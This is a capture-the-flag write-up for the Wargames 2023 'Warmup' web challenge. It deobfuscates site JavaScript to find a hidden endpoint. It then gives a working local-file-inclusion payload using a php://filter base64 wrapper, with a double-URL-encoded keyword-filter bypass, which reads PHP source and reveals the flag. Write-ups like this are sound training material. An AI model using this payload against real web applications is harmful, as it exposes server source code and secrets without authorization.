# **Wargames2023 - Warmup** [toc] ## Description >Let's warm up! http://warmup.wargames.my Broswing to the application, it requires a password to be input.  ## Solution After browsing around, we can find that there is obsfucated JavaScript under *http://warmup.wargames.my/static/script.min.js*. Deobsfucating it reveals a secret endpoint which contains the flag. ``` if (document.querySelector("input").value === "this_password_is_so_weak_i_can_crack_in_1_sec!") { fetch("/api/4aa22934982f984b8a0438b701e8dec8.php?x=flag_for_warmup.php").then(_0x5c12f5 => _0x5c12f5.text()).then(_0x509e6e => Swal.fire({ 'title': "Good job!", 'html': _0x509e6e, 'icon': "success" })); } ``` ``` /api/4aa22934982f984b8a0438b701e8dec8.php?x=flag_for_warmup.php ``` <br> The hint indicates that the flag is in a comment. But it is not shown in the page source. It might be a PHP comment that is in the source code of this file. We can utilise the LFI on this page to try and find the flag.  Trying to base64 encode using **php://filter/convert.base64-encode/resource=flag_for_warmup.php** results in an error due to the application blocking the keyword 'convert.' To bypass this, we'll double URL encode the letter 't' in the word 'convert.' ## Payload ``` http://warmup.wargames.my/api/4aa22934982f984b8a0438b701e8dec8.php?x=php://filter/conver%2574.base64-encode/resource=flag_for_warmup.php ``` Base64 decode the value for the flag. ``` <?php error_reporting(0); echo('here\'s your flag <small>in comment</small> <!-- well, maybe not this comment -->'); // wgmy{1ca200caa85d3a8dcec7d660e7361f79} ``` ###### tags: `CTF`